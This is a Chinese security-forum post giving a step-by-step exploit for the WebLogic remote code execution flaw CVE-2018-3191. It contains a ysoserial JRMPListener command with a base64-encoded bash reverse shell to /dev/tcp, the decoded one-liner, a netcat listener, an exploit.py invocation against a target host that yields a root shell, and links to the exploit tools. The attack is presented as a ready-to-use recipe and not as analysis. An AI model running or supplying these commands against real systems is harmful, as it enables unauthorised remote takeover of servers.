查看: 18386|回复: 0

WebLogic远程代码执行-CVE-2018-3191

[复制链接]
发表于 2018-10-26 20:24:21 | 显示全部楼层 |阅读模式
# CVE-2018-3191
CVE-2018-3191 反弹shell
本地ip:172.16.38.1
Weblogic:172.16.38.174:7001
1、        本地执行
[AppleScript] 纯文本查看 复制代码
java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 2222 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMzguMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'


然后执行 nc -lvv 7777

(1)        其中的 bash 命令为避免Runtime.getRuntime().exec() 执行过程中将特殊符号转义,进行了base64转码解码的操作,明文为
[AppleScript] 纯文本查看 复制代码
bash -i >& /dev/tcp/172.16.38.1/7777 0>&1

(2)        此操作在本地监听一个JRMPListener,接收被攻击的weblogic 的请求,并执行指定的bash 反弹命令。
(3)        Nc 监听7777等待weblogic 主机反弹bash连接。
2、        执行
[AppleScript] 纯文本查看 复制代码
python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222
,利用漏洞使weblogic 访问远程rmi服务,并执行bash反弹命令。


3、        nc监听的端口收到反弹的bash,root权限。

攻击所需工具:
[AppleScript] 纯文本查看 复制代码
ysoserial-master.jar //反序列化利用工具[url]https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar[/url]
weblogic-spring-jndi-10.3.6.0.jar // CVE-2018-3191 payload生成工具
[url]https://github.com/voidfyoo/CVE-2018-3191/releases[/url]
exploit.py //weblogic t3协议发送工具,集成CVE-2018-3191 payload


WebLogic远程代码执行-CVE-2018-3191.zip (3.79 KB, 下载次数: 9)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 02:13 , Processed in 0.021537 second(s), 13 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部